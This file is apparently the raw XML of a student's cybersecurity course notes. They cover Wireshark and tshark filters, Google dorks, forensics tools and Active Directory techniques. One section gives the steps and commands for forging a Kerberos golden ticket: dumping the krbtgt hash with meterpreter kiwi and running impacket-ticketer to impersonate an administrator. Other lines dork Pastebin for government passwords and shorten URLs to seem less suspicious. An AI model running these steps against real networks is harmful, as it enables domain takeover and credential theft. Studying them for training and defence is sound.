    <w:p w14:paraId="6363FF3A" w14:textId="7FB52F69" w:rsidR="00296C76" w:rsidRDefault="00883A17" w:rsidP="00FF725F">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5E279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p w14:paraId="23D753D3" w14:textId="77777777" w:rsidR="00873EBB" w:rsidRDefault="00873EBB" w:rsidP="00FF725F">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AF33307" w14:textId="77777777" w:rsidR="00873EBB" w:rsidRDefault="00873EBB" w:rsidP="00FF725F">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70B7AD9" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRDefault="009C77E4" w:rsidP="00FF725F">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991575C" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRDefault="009C77E4" w:rsidP="00FF725F">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27394D1" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRDefault="009C77E4" w:rsidP="00FF725F">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B88BFAB" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRDefault="009C77E4" w:rsidP="00FF725F">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F5ADF61" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRDefault="009C77E4" w:rsidP="00FF725F">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BB0B36D" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRDefault="009C77E4" w:rsidP="00FF725F">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B0D9BE9" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRDefault="009C77E4" w:rsidP="00FF725F">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0244ACA" w14:textId="77777777" w:rsidR="005E279D" w:rsidRDefault="005E279D" w:rsidP="00296C76">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04C1B16" w14:textId="4FEC0C90" w:rsidR="00C97ECA" w:rsidRPr="00C97ECA" w:rsidRDefault="00C97ECA" w:rsidP="00C97ECA">
      <w:pPr>
        <w:jc w:val="center"/>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Wireshark filter syntax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A8C4D3A" w14:textId="7389AB10" w:rsidR="002D2B47" w:rsidRDefault="005E279D" w:rsidP="002D2B47">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ip.src == 10.10.10.10</w:t>
      </w:r>
      <w:r w:rsidR="00D27AC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ip.dst == 10.10.10.10</w:t>
      </w:r>
      <w:r w:rsidR="009E3A5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ip.addr == 10.10.10.10 – search for packets with this ip address in source or destination</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eth.src == (MAC address)</w:t>
      </w:r>
      <w:r w:rsidR="00E9081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search packets with this source MAC address</w:t>
      </w:r>
      <w:r w:rsidR="00E9081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eth.dst == (MAC address) – search packets with this destination MAC address</w:t>
      </w:r>
      <w:r w:rsidR="0066281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eth.addr == 08:8A… - search for packets that with this MAC address in source or destination</w:t>
      </w:r>
      <w:r w:rsidR="00E9081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dns.qry.name == “xxx.com” – search for domain name</w:t>
      </w:r>
      <w:r w:rsidR="00E9081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6D75C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udp.port == 5355 – scan for specific udp port</w:t>
      </w:r>
      <w:r w:rsidR="008A577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tcp.port == 445 – scan for specific tcp port</w:t>
      </w:r>
      <w:r w:rsidR="006D75C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ip.version == 4 – search for only ipv4 packets</w:t>
      </w:r>
      <w:r w:rsidR="0037181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ip.version == 6 – search for only ipv6 packets</w:t>
      </w:r>
      <w:r w:rsidR="002D2B4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frame contains “login” – search for packets that contain the wor</w:t>
      </w:r>
      <w:r w:rsidR="00B75E8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sidR="002D2B4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login</w:t>
      </w:r>
      <w:r w:rsidR="00B75E8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http.request.method == “GET” &amp;&amp; ip.src == 10.10.10.10 – filter for all the packets with get that specific ip shows there</w:t>
      </w:r>
      <w:r w:rsidR="000C152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http.request.uri contains “.gif” – search for specific word inside http protocol</w:t>
      </w:r>
      <w:r w:rsidR="000C152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tcp.flag.syn == 1 &amp;&amp; tcp.flag.ack == 0 – shows all the packets that syn is defined but ack does not, which happen when someone scanning ports</w:t>
      </w:r>
      <w:r w:rsidR="00CD1EAB">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not arp – </w:t>
      </w:r>
      <w:r w:rsidR="00F8372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exclude</w:t>
      </w:r>
      <w:r w:rsidR="00CD1EAB">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8372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arp packets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F00461" w14:textId="77777777" w:rsidR="00813D0D" w:rsidRDefault="00813D0D" w:rsidP="002D2B47">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9188989" w14:textId="77777777" w:rsidR="00813D0D" w:rsidRDefault="00813D0D" w:rsidP="002D2B47">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5746500" w14:textId="77777777" w:rsidR="00813D0D" w:rsidRDefault="00813D0D" w:rsidP="002D2B47">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B49B186" w14:textId="77777777" w:rsidR="00813D0D" w:rsidRDefault="00813D0D" w:rsidP="002D2B47">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E0262D5" w14:textId="77777777" w:rsidR="00813D0D" w:rsidRDefault="00813D0D" w:rsidP="002D2B47">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F2EC042" w14:textId="77777777" w:rsidR="00813D0D" w:rsidRDefault="00813D0D" w:rsidP="002D2B47">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F74C57" w14:textId="77777777" w:rsidR="00813D0D" w:rsidRDefault="00813D0D" w:rsidP="002D2B47">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CFAB866" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRDefault="009C77E4" w:rsidP="002D2B47">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0EA1A1C" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRDefault="009C77E4" w:rsidP="002D2B47">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99CFAD" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRDefault="009C77E4" w:rsidP="002D2B47">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B9F21F5" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRDefault="009C77E4" w:rsidP="002D2B47">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CCEE357" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRDefault="009C77E4" w:rsidP="002D2B47">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061C594" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRDefault="009C77E4" w:rsidP="002D2B47">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064A14" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRDefault="009C77E4" w:rsidP="002D2B47">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F1180BB" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRDefault="009C77E4" w:rsidP="002D2B47">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C309916" w14:textId="77777777" w:rsidR="00813D0D" w:rsidRDefault="00813D0D" w:rsidP="002D2B47">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23A714E" w14:textId="77777777" w:rsidR="00813D0D" w:rsidRDefault="00813D0D" w:rsidP="002D2B47">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ACC23E8" w14:textId="13C3E844" w:rsidR="00847C8A" w:rsidRPr="00C97ECA" w:rsidRDefault="00847C8A" w:rsidP="00847C8A">
      <w:pPr>
        <w:jc w:val="center"/>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Tshark syntax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3F7DDB" w14:textId="440141B0" w:rsidR="00847C8A" w:rsidRDefault="00660D7F" w:rsidP="002D2B47">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Tshark – a CLI for wireshark, you can use it for make automations or search for thing more easily.</w:t>
      </w:r>
      <w:r w:rsidR="0077103E">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when hardening to find the right filter, you can use wireshark and choose the wanted field, choose “use as filter” and you will see the syntax, th</w:t>
      </w:r>
      <w:r w:rsidR="00ED035E">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 you can write this filter in -Y flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473CC2B4" w14:textId="2E12FF44" w:rsidR="00DE0241" w:rsidRDefault="00E957E7" w:rsidP="00DE0241">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tshark -I eth0 – capture packets (you cant use in this terminal during this time)</w:t>
      </w:r>
      <w:r w:rsidR="00C6267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tshark -I eth0 -w class.pcap – show the amount of packets it captured and write it to this file</w:t>
      </w:r>
      <w:r w:rsidR="00C6267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-I – flag for sniff packets</w:t>
      </w:r>
      <w:r w:rsidR="00C6267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-r – flag for use exist file of packets</w:t>
      </w:r>
      <w:r w:rsidR="00EF488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-Y/--display-filter - -Y is a shorthand of --display-filter, it filter as the syntax of wireshark filter</w:t>
      </w:r>
      <w:r w:rsidR="005675E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-e – flag for get certain field inside the packets</w:t>
      </w:r>
      <w:r w:rsidR="00813D0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-z – flag for the statistics of wireshark</w:t>
      </w:r>
      <w:r w:rsidR="00813D0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--export-objects – flag for extract files</w:t>
      </w:r>
      <w:r w:rsidR="00CF6E4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-T fields – for specify </w:t>
      </w:r>
      <w:r w:rsidR="00115F4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type of info</w:t>
      </w:r>
      <w:r w:rsidR="00115F4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-e – for name the field, type -e for every field</w:t>
      </w:r>
      <w:r w:rsidR="00390A2E">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-v – shows the header of the framee</w:t>
      </w:r>
      <w:r w:rsidR="00EF488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A27EB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00EF488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shark -r cap.pcap -Y  </w:t>
      </w:r>
      <w:r w:rsidR="00C6267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F488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‘ip.src==10.10.10.10 &amp;&amp; http’ – the flag -r for open the file, and the flag -Y for filter to this source ip and http protocol</w:t>
      </w:r>
      <w:r w:rsidR="005675E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A27EB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005675E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shark -r cap.pcap -Y ‘http’ -T fields -e ‘ip.src’ – filter for http packets and get only their ip.src field</w:t>
      </w:r>
      <w:r w:rsidR="00813D0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A27EB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00813D0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shark -r cap.pcap –export-objects http,files_http – extract the files that received in http protocol and save them inside files_http directory</w:t>
      </w:r>
      <w:r w:rsidR="00C1532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A27EB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00C1532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shark -r net.pcap -Y “frame.number==161” -T fields -e tcp.dstport -e udp.dstport – search for frame 161 and print the destination tcp and udp ports</w:t>
      </w:r>
      <w:r w:rsidR="00A27EB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Tshark -r net.pcap -z conv,ip – show the statistics of conversations, ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F89160" w14:textId="1C36DF15" w:rsidR="0080350A" w:rsidRDefault="00A27EB3" w:rsidP="00DE0241">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00950D1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shark -r net.pcap -T fields -e ‘eth.addr’ | sed ‘s/,/ /g’ | awk ‘{for(i=1; i&lt;=NF; i++) {print $i}}’ | sort | uniq | wc – shows all the eth.src and eth.dst in groups of eth.src,eth.dst, then the sed switch the , in space, and the awk make all the two columns to one column, and the sort uniq and wc count the uniqe ethernet addresses in the file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D46935" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRPr="009D0E12" w:rsidRDefault="009C77E4" w:rsidP="00DE0241">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C090DAF" w14:textId="622ACA55" w:rsidR="0080350A" w:rsidRPr="00294C81" w:rsidRDefault="00294C81" w:rsidP="00294C81">
      <w:pPr>
        <w:jc w:val="center"/>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Google dorks syntax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B98E2A7" w14:textId="77777777" w:rsidR="00090CBC" w:rsidRDefault="0080350A" w:rsidP="00882BF3">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filetype: csv site: za budget – search for csv files from za area that has connection to the word “budget”, there is not : before the word “budget” so it make free search on it.</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site: Pastebin.com intext </w:t>
      </w:r>
      <w:r w:rsidR="00772D9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gov.il passwords – search in the site Pastebin.com words in the conext of gov.il passwords.</w:t>
      </w:r>
      <w:r w:rsidR="00772D9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inurl – search inside url</w:t>
      </w:r>
      <w:r w:rsidR="00772D9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intitle – search inside title</w:t>
      </w:r>
      <w:r w:rsidR="00772D9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filetype – txt,csv, and more</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612D6ACC" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRDefault="009C77E4" w:rsidP="00882BF3">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863F6B0" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRDefault="009C77E4" w:rsidP="00882BF3">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72008CC" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRDefault="009C77E4" w:rsidP="00882BF3">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2FA36D1" w14:textId="77777777" w:rsidR="00DE253C" w:rsidRDefault="00DE253C" w:rsidP="00882BF3">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4FCD7AF" w14:textId="1FF4A8BE" w:rsidR="00DE253C" w:rsidRPr="00294C81" w:rsidRDefault="00DE253C" w:rsidP="00DE253C">
      <w:pPr>
        <w:jc w:val="center"/>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Creating Golden Ticket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18493C76" w14:textId="3DA7F201" w:rsidR="00A42FA5" w:rsidRDefault="00DE253C" w:rsidP="00A42FA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For create golden ticket we need 3 </w:t>
      </w:r>
      <w:r w:rsidR="00A42FA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things:</w:t>
      </w:r>
      <w:r w:rsidR="00A42FA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1. Domain Name</w:t>
      </w:r>
      <w:r w:rsidR="00A42FA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2. SID</w:t>
      </w:r>
      <w:r w:rsidR="00A42FA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3. KRBTGT hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D349EB4" w14:textId="54F7F449" w:rsidR="00702525" w:rsidRDefault="00702525" w:rsidP="0070252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252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krbtgt account is a default service account in </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w:t>
      </w:r>
      <w:r w:rsidRPr="0070252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icrosoft </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Pr="0070252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ctive </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sidRPr="0070252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irectory used by the Kerberos Key Distribution Center (KDC) service. This account's primary function is to sign and encrypt Ticket Granting Tickets (TGTs) used within the Kerberos authentication process</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A564511" w14:textId="7CB14D9E" w:rsidR="00A42FA5" w:rsidRDefault="00A42FA5" w:rsidP="00A42FA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get domain name we can use nmap tool.</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To get SID we we can use 2 ways, but we need session to the machine for that.</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we can run the command whoami /user and find the SID</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or we can use meterpreter session to use kiwi commands, firstly we need to write “load kiwi” to load kiwi commands, then use “dcsync_ntlm krbtgt”</w:t>
      </w:r>
      <w:r w:rsidR="0070252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command</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we will find in the output the SID, also the third thing we looked for, the NTLM hash.</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then, by running the next command we can create the golden ticket:</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impacket-ticketer -nthash</w:t>
      </w:r>
      <w:r w:rsidR="00FA63E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-domain-sid </w:t>
      </w:r>
      <w:r w:rsidR="003D50F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s-1…. -domain … hack3r -dc-ip 10.10.10.10 – we need the insert the nthash we found, the SID we found, the name of the domain, the user</w:t>
      </w:r>
      <w:r w:rsidR="0070252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 want to impersonate to (we can choose any exist user and we will prefer high privilege user as admin)</w:t>
      </w:r>
      <w:r w:rsidR="003D50F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and the ip of the DC</w:t>
      </w:r>
      <w:r w:rsidR="0070252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D07DB14" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRDefault="009C77E4" w:rsidP="00A42FA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A3BF58" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRDefault="009C77E4" w:rsidP="00A42FA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D42B394" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRDefault="009C77E4" w:rsidP="00A42FA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8A1E4B6" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRDefault="009C77E4" w:rsidP="00A42FA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835F400" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRDefault="009C77E4" w:rsidP="00A42FA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A8E72C7" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRDefault="009C77E4" w:rsidP="00A42FA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10AA8CD" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRDefault="009C77E4" w:rsidP="00A42FA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6E2590D" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRDefault="009C77E4" w:rsidP="00A42FA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85D90C" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRDefault="009C77E4" w:rsidP="00A42FA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5F66EA8" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRDefault="009C77E4" w:rsidP="00A42FA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C9A886E" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRDefault="009C77E4" w:rsidP="00A42FA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C21045D" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRDefault="009C77E4" w:rsidP="00A42FA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C6B5943" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRDefault="009C77E4" w:rsidP="00A42FA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798169F" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRDefault="009C77E4" w:rsidP="00A42FA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0143868" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRPr="00A42FA5" w:rsidRDefault="009C77E4" w:rsidP="00A42FA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B77D33A" w14:textId="3ACF1CCA" w:rsidR="00585246" w:rsidRDefault="00772D97" w:rsidP="00601DF1">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p w14:paraId="2EEF14B0" w14:textId="2B1569E5" w:rsidR="00585246" w:rsidRPr="00294C81" w:rsidRDefault="00585246" w:rsidP="00585246">
      <w:pPr>
        <w:jc w:val="center"/>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Tools  information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54598F28" w14:textId="77777777" w:rsidR="00585246" w:rsidRDefault="00585246" w:rsidP="00585246">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OSForensics – common tool to investigate files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD5DBC8" w14:textId="77777777" w:rsidR="00585246" w:rsidRDefault="00585246" w:rsidP="00585246">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Networkminer – good tool for investigate pcap file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="495D50DC" w14:textId="77777777" w:rsidR="00585246" w:rsidRDefault="00585246" w:rsidP="00585246">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FTK imager – you can load to this tool file or vmdk files and investigate them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB03C9E" w14:textId="2467BD1F" w:rsidR="00585246" w:rsidRDefault="00585246" w:rsidP="00585246">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HxD - You can load files to this tool and investigate files.</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ctrl + G/F – for search inside the file.</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You can use the tool for change headers/trailers then open file you could not before, sometimes you need to change the extension of the file in the name accordingly, windows know hot to find a file by the extension name in the contrary of linux.</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it possible to use the tool for search files inside the original file, as pdf files and more, find the blocks of header and trailer, copy all the blocks between them to new file and call this file with the appropriate extension then you could open the “hidden” file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="019617A3" w14:textId="754ED532" w:rsidR="00D360F5" w:rsidRDefault="00585246" w:rsidP="00D360F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Event </w:t>
      </w:r>
      <w:r w:rsidR="00D360F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iewer – you can see all kind of activities that happen on the machine, we use that for watch on anomaly in the network</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security field</w:t>
      </w:r>
      <w:r w:rsidR="00D360F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the most used, and</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enable use to see security stuff as log of users, when user fail to log, add user to domain, and more.</w:t>
      </w:r>
      <w:r w:rsidR="0089352E">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we use ctrl + f to search for strings (search even inside the events)</w:t>
      </w:r>
      <w:r w:rsidR="0089352E">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we also filter option of the tool to search for certain id event and more.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A34AF3A" w14:textId="77777777" w:rsidR="002D17B5" w:rsidRDefault="00D360F5" w:rsidP="00D360F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Local Security Policy – the place we define which kind of actions will appear in event viewer, we want the less we can for there will not be too much noise</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7459B7" w14:textId="77777777" w:rsidR="002D17B5" w:rsidRDefault="002D17B5" w:rsidP="00D360F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PEView – a tool that help us to find if a file packed or encrypted</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EDAF696" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRDefault="002D17B5" w:rsidP="0036430B">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Procmon – process monitor, show us software that running on the machine, and resources the software uses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F15EDE4" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRDefault="009C77E4" w:rsidP="0036430B">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F5C6DCD" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRDefault="009C77E4" w:rsidP="0036430B">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5213A13" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRDefault="009C77E4" w:rsidP="0036430B">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0194F50" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRDefault="009C77E4" w:rsidP="0036430B">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31203CB" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRDefault="009C77E4" w:rsidP="0036430B">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9970B1A" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRDefault="009C77E4" w:rsidP="0036430B">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D09DF02" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRDefault="009C77E4" w:rsidP="0036430B">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C07194C" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRDefault="009C77E4" w:rsidP="0036430B">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C4D9925" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRDefault="009C77E4" w:rsidP="0036430B">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8DC88EB" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRDefault="009C77E4" w:rsidP="0036430B">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87542C1" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRDefault="009C77E4" w:rsidP="0036430B">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1D15B71" w14:textId="2F7D6415" w:rsidR="006D0E34" w:rsidRDefault="00772D97" w:rsidP="0036430B">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p w14:paraId="51A05E09" w14:textId="30083C46" w:rsidR="002D166C" w:rsidRPr="00294C81" w:rsidRDefault="006D0E34" w:rsidP="002D166C">
      <w:pPr>
        <w:jc w:val="center"/>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Extra information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A4B571" w14:textId="09806901" w:rsidR="00AD5A99" w:rsidRDefault="00806014" w:rsidP="0043077E">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00AD5A9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normal user</w:t>
      </w:r>
      <w:r w:rsidR="00AD5A9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 root user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE4211B" w14:textId="3FCF809E" w:rsidR="0043077E" w:rsidRDefault="0043077E" w:rsidP="0043077E">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/tmp – stores temporary files</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/home – where all the home directories of all the users are found</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/var – variable data files such log files and more</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/etc – local system configuration file</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/boot – files required to boot linux</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/bin – contains a lot of commands as ls, rm and more</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7F00AD" w14:textId="161C0A13" w:rsidR="005033DB" w:rsidRDefault="005033DB" w:rsidP="0043077E">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NT Authority/system – the strongest user in windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FCF1014" w14:textId="59C4EEF8" w:rsidR="00AD5A99" w:rsidRDefault="00D232DD" w:rsidP="00AD5A99">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w:t>
      </w:r>
      <w:r w:rsidR="006749F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irustotal – you can load file or url and it checks it hash to check if the file found problematic in the past</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Any.run – you can scan virus through this site but oppose to virustotal, this site is not save what you upload in its DB.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EBBB67F" w14:textId="77777777" w:rsidR="00AD5A99" w:rsidRDefault="006749F7" w:rsidP="00AD5A99">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cyberchef – site that helps in convertions of bases like from hex to binary, from base 64, and more.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A8226A" w14:textId="77777777" w:rsidR="00AD5A99" w:rsidRDefault="006749F7" w:rsidP="00AD5A99">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crackstation – site for crack passwords, solve hashes a lot the john does not succeeds (on its default file)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49381950" w14:textId="77777777" w:rsidR="0088672A" w:rsidRDefault="00772D97" w:rsidP="00AD5A99">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shodan – site for passive scans, its has its own syntax, os: or org: and hostname: and more.</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robots.txt – prevents index of google.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE18DDF" w14:textId="77777777" w:rsidR="003A3976" w:rsidRDefault="0088672A" w:rsidP="00AD5A99">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Cupp -I – tool that ask questions as the name of the dog and more for creates possible passwords, for install in you need to write “cupp” and enter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2282A361" w14:textId="206C9C13" w:rsidR="001C0EBD" w:rsidRDefault="001C0EBD" w:rsidP="00AD5A99">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TheFatRat – tool for creating payloads, it also cooperate with msfvenom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB0F085" w14:textId="46CF7A92" w:rsidR="000E13AB" w:rsidRDefault="000E13AB" w:rsidP="00AD5A99">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Kerberute – tool for exploit the Kerberos protocol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4334E083" w14:textId="5BF3F7A2" w:rsidR="00D80B1B" w:rsidRDefault="00D80B1B" w:rsidP="00AD5A99">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Garry Kessler – site that shows headers and trailers by type of files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A18A9D1" w14:textId="7C448467" w:rsidR="00585246" w:rsidRDefault="00655DAB" w:rsidP="00585246">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 minutes mail – site that give you mail to use for 10 minutes, if you want to enter a site without to sign</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32914926" w14:textId="1AE4E311" w:rsidR="00540DD2" w:rsidRDefault="00540DD2" w:rsidP="00585246">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tinyURL – site that get as input URL and output tiny URL, reduce the size of URL and enable us to make URL less suspicious</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B54D2B8" w14:textId="65023E98" w:rsidR="00B4458F" w:rsidRDefault="00B4458F" w:rsidP="00585246">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file.io – a site that can host out file for temporary time (could use for transfer files between two machines)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6298815D" w14:textId="6C20219C" w:rsidR="00A30CDC" w:rsidRDefault="00A30CDC" w:rsidP="00585246">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certutil – tool that convert exe to bat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB83F21" w14:textId="5EF8B1EC" w:rsidR="00A25F69" w:rsidRDefault="00A25F69" w:rsidP="00585246">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Glassdoor – anonymous criticism on hitech companies </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31AC08BB" w14:textId="0113DE2F" w:rsidR="00D00FB0" w:rsidRDefault="00D00FB0" w:rsidP="00585246">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Hak5 – cool site that contains components for hacking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B55B29" w14:textId="5975E358" w:rsidR="003D6D1D" w:rsidRDefault="003D6D1D" w:rsidP="00585246">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Viewdns.info – a site that get as input ip or domain and returns data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="780B699B" w14:textId="43B19448" w:rsidR="003D6D1D" w:rsidRDefault="003D6D1D" w:rsidP="00585246">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Dorksearch.com </w:t>
      </w:r>
      <w:r w:rsidR="00BD11C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D11C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ai site that build the query of google dorks by the info you enter him about what you want to find</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="699C2995" w14:textId="53FE5A6E" w:rsidR="00D00FB0" w:rsidRDefault="00D00FB0" w:rsidP="00585246">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Rabbit Hole – Ai for hackers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76921AF4" w14:textId="6223F295" w:rsidR="005C6F18" w:rsidRDefault="005C6F18" w:rsidP="00585246">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Htttrack – tool that can extract all the pages behind a site</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httrack </w:t>
      </w:r>
      <w:hyperlink r:id="rId13" w:history="1">
        <w:r w:rsidRPr="00F975F8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>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https://www.johnbryce.co.il</w:t>
        </w:r>
      </w:hyperlink>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take all the pages behind this site</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040D7B18" w14:textId="7DEE9B43" w:rsidR="00C23D7B" w:rsidRDefault="00C23D7B" w:rsidP="00585246">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Blackbox – investigate as PT and get lil info as ip and subnet</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greybox - investigate as PT and get mediocre info as ip domains urls and more.</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whitebox – investigate as PT and get a lot of info, even users sometimes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B34819" w14:textId="2379E350" w:rsidR="0043739B" w:rsidRDefault="0043739B" w:rsidP="00585246">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OSINT – search info on internet in bare places (passive investiga</w:t>
      </w:r>
      <w:r w:rsidR="0018066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ion)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3684E642" w14:textId="751DC585" w:rsidR="00032DDE" w:rsidRDefault="00032DDE" w:rsidP="00585246">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Burpsuite – tool for web scanning, you can use also brute force on a site using that tool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5F1178" w14:textId="64426AE5" w:rsidR="00A25F69" w:rsidRDefault="00A25F69" w:rsidP="00585246">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Nessus – strong tool that scan similar to nmap but has its advantages and disadvantages</w:t>
      </w:r>
      <w:r w:rsidR="003E0EA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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="002D4975" w14:textId="39164394" w:rsidR="00685BB6" w:rsidRDefault="00685BB6" w:rsidP="00685BB6">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Samba – meaning smb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50FBD374" w14:textId="7B1ECFCD" w:rsidR="00592E6C" w:rsidRDefault="00592E6C" w:rsidP="007D60FA">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Warning – when using recursion you need to put return sometimes in the right place</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otherwise the function can continue again after it reached to the end.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E29C63" w14:textId="39198618" w:rsidR="00ED15CF" w:rsidRDefault="00ED15CF" w:rsidP="007D60FA">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Pwsh/powershell – if write it in terminal or cmd, you can open powershell shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3522FADD" w14:textId="52369397" w:rsidR="009A1845" w:rsidRDefault="009A1845" w:rsidP="007D60FA">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difference between portable file or installer file is the installer you are install on the computer what take more time and you cant pass it with disk on key, and sometimes you don’t have the permissions to install in on the computer, but it found on the computer which have faster abilities and more comfortable to use, on the contrary the portable file is a file that can run without install permissions, and you can pass it on disk on key</w:t>
      </w:r>
      <w:r w:rsidR="000B0A5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1DA4091" w14:textId="23301916" w:rsidR="00897B79" w:rsidRPr="00897B79" w:rsidRDefault="00897B79" w:rsidP="007D60FA">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enter inside share directory of windows we can write in linux in the place of path in the directory the path, like smb://10.10.10.10/c$/ then we will need to enter user and password and we can enter the directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0209A199" w14:textId="56554949" w:rsidR="00ED1CCC" w:rsidRDefault="00ED1CCC" w:rsidP="007D60FA">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Php – a language that web developers are using</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5934F748" w14:textId="4C63059E" w:rsidR="00662F80" w:rsidRDefault="00662F80" w:rsidP="007D60FA">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NBNS,DNS,LLMNR – all of them protocol for name resolution </w:t>
      </w:r>
      <w:r w:rsidR="003618C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DHCP – contains hostname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052626AB" w14:textId="77777777" w:rsidR="002B6713" w:rsidRDefault="002B6713" w:rsidP="007D60FA">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66F673F" w14:textId="77777777" w:rsidR="002B6713" w:rsidRDefault="002B6713" w:rsidP="007D60FA">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6FCA5B" w14:textId="77777777" w:rsidR="002B6713" w:rsidRDefault="002B6713" w:rsidP="007D60FA">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3E2147A" w14:textId="77777777" w:rsidR="002B6713" w:rsidRDefault="002B6713" w:rsidP="007D60FA">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F870BB1" w14:textId="77777777" w:rsidR="002B6713" w:rsidRDefault="002B6713" w:rsidP="007D60FA">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6FF7715" w14:textId="77777777" w:rsidR="002F7AA6" w:rsidRDefault="002F7AA6" w:rsidP="00AD5A99">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>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E3D3095" w14:textId="019D4054" w:rsidR="005E279D" w:rsidRPr="00296C76" w:rsidRDefault="0088672A" w:rsidP="00AD5A99">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6D75C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p w14:paraId="41CE8420" w14:textId="1701393B" w:rsidR="002F7AA6" w:rsidRPr="00294C81" w:rsidRDefault="002F7AA6" w:rsidP="002F7AA6">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>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Commands From</w:t>
      </w:r>
      <w:r>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HTB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F7FEB0" w14:textId="5DE3CC0C" w:rsidR="00136837" w:rsidRDefault="00F663C6" w:rsidP="00136837">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Sudo smbmap -H 10.10.10.10 -u admin – may let you see the names of the share directories, and permissions (smb port need to be opened)</w:t>
      </w:r>
